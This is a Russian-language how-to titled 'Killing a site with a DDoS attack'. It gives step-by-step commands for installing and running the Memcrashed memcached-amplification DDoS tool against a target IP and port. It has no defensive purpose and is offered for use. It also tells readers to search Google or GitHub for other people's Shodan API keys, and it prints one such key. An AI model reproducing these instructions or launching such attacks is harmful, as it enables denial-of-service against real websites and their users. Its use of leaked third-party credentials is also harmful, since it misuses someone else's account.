Убиваем сайт DDoS атакой

Cлышали о нашумевшей атаке на Github? Для её усиления использовались сервера Memcrashed. Мы научим вас работать с этим софтом!

Многие из Вас, наверное, слышали о нашумевшей атаке на Github. Для её усиления использовались сервера Memcrashed и в результате мощность составила около 1,35Тб/сек. Не слабо так, да?

Сегодня мы рассмотрим инструмент, который позволяет нам повторить подобную атаку. Для этого на github есть специальный инструмент под названием Memcrashed.

Работать будем в Kali Linux

• Запускаем, открываем терминал и для сначала как всегда вводим:

apt update

apt upgrade

• Установим Python, если вы еще этого не делали:

apt-get install python3

apt-get install python3-pip

• Затем установим еще два необходимых компонента

pip install scapy

pip install shodan

• Скачиваем файлы программы с Github

git clone https://github.com/zadachnik/memcrashed-ddos.git

• Переходим в папку

cd memcrashed-ddos

• Затем

pip install -r requirements.txt

Примечание:

• Если при установке каких-то компонентов у вас выскакивает ошибка, можете попробовать писать команду так:

pip3 install ...

Продолжаем

Для осуществления атаки нам понадобится специальный API Key. Его можно поискать с помощью Google или на том же Github. Вводим что-то типа "api key" "api key shodan" и т.д.

Для примера я возьму тот, что представлен на github

• Создадим файл api.txt с нашим ключом:

echo "PSKINdQe1GyxGgecYz2191H2JoS9qvgD" > api.txt

Повторюсь вы можете использовать свой API Key

Запускаем

python3 Memcrashed.py

Далее всё просто.

• Вас будут спрашивать есть ли у вас локальные боты (сохраненный поиск Shodan) или же искать по api key на Shodan. Тут выбираем второй вариант.

Сохранять ли результат для следующего раза - решать вам.

Далее попросят ввести:

• IP цели
• По какому порту производить атаку (тут нужен открытый порт у цели). Мощность атаки ( Enter preferred power (Default 1): )
• Enter payload contained inside packet - пишем, например, 2 или 100

Готово